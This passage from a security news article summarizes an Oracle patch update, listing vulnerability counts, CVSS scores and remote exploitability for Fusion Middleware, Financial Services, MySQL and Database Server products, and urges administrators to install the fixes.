On the other hand, users of the Oracle Fusion Middleware software family will need to install a total of 56 security patches affecting nearly 20 related services, including Identity Manager Connector (v. 9.0), Big Data Discovery (v. 1.6), and WebCenter Portal (v. 11.1.1.9.0, 12.2.1.3.0, 12.2.1.4.0).

This bulk update also includes patches for moderately serious security flaws. Fifteen of these flaws received a score of 8.5/10 on the CVSS scale and can be exploited remotely by an unauthenticated hacker, cloud security course specialists mention. Additional technical details for each of these vulnerabilities will be released next Thursday.

Finally, Oracle also included fixes for 34 critical vulnerabilities in the Oracle Financial Services suite, of which 14 are remotely exploitable. In addition, 45 security flaws were found in Oracle MySQL that could be exploitable remotely; one of these flaws received a score of 9.8/10 on the CVSS scale. 

The report concludes by mentioning that the Oracle Database Server line contains nine security errors, two of which are remotely exploitable and received a score of 8/10 on the CVSS scale. Oracle has received no reports of exploit attempts against any of these flaws, but it urges administrators of affected deployments to install the appropriate updates as soon as possible.

For further reports on vulnerabilities, exploits, malware variants and information security risks you can access the Website of the International Institute of Cyber Security (IICS), as well as the official platforms of technology companies.
